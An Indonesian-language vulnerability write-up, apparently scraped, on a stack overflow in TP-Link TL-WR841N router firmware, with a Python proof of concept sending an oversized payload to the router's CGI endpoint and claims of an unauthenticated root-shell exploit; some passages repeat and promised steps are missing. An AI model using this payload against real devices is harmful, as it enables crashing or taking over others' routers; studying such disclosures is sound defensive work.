Cara Reverse Shell Menggunakan Weevely Di Linux
Weevely adalah PHP web shell backdor yang mensimulasikan koneksi seperti telnet. …
Produk perusahaan penyedia layanan jaringan TP-Link, Router (TL-WR841Nv14_US_0.9.1_4.18) ditemukan mengandung stack overflow dalam fungsi dm_fillObjByStr(). Kerentanan ini memungkinkan penyerang yang tidak diautentikasi untuk mengeksekusi kode arbitrer.
Router nirkabel TP-link WR841N gambaran umum simulasi versi terbaru.
firmware update new version
Pembaruan firmware terbaru hingga 2021-04-09, Dalam fungsi library(libcmm.so) dm_fillObjByStr(), langsung panggil strncpy untuk menyalin konten input ke variabel lokal v26. Jika panjang salinan dan konten salinan dapat dikontrol, ada kerentanan stack overflow di lokasi ini.
Kerentanan ini dapat mempengaruhi versi terbaru perangkat TP-Link WR841 (2021-04-09). Dengan menggunakan POC yang disediakan dapat menyerang dan menyebabkan layanan http mogok, menunjukkan bahwa memang ada kerentanan stack overflow, dan program httpd tidak membuka mekanisme perlindungan apa pun.
Seperti yang ditunjukkan pada gambar di bawah, sehingga eskalasi hak istimewa mudah digunakan. Anda dapat menggunakan Padding untuk membajak EIP terlebih dahulu, dan menggunakan ROP untuk mengeksekusi kode eskalasi hak istimewa.
Menyerang service SNMP menyebabkan proses restart
Untuk mereproduksi kerentanan, Anda dapat mengikuti langkah-langkah berikut:
import requests
headers = {
"Host": "192.168.0.1",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "text/plain",
"Content-Length": "78",
"Origin": "http://192.168.0.1",
"Connection": "close",
"Referer": "http://192.168.0.1/"
}
payload = "a" * 2048
formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\nname={}\r\noldPwd=admin\r\npwd=test\r\n".format(payload)
url = "http://192.168.0.1/cgi?8"
response = requests.post(url, data=formdata, headers=headers)
print response.text
Efek serangan dari POC
Untuk mereproduksi exploit, Anda dapat mengikuti langkah-langkah berikut:
Efek serangan exploit
Exploit ini menggunakan serangan multi-utas untuk mencapai efek yang sangat stabil untuk mendapatkan shell root, dan tidak memerlukan kata sandi apa pun untuk masuk untuk mengakses router, yang merupakan kerentanan RCE yang tidak sah. (Seperti yang ditunjukkan pada gambar di bawah, tidak ada login web)
Tidak diperlukan login sebelum serangan
Untuk mereproduksi exploit, Anda dapat mengikuti langkah-langkah berikut:
Efek serangan exp
Exploit menggunakan serangan multithreading, yang dapat mencapai efek yang sangat stabil untuk mendapatkan shell root, dan tidak memerlukan kata sandi untuk masuk dan mengakses router. Ini adalah kerentanan RCE yang tidak sah. (seperti yang ditunjukkan pada gambar di bawah, tidak ada login web)
tidak perlu login sebelum menyerang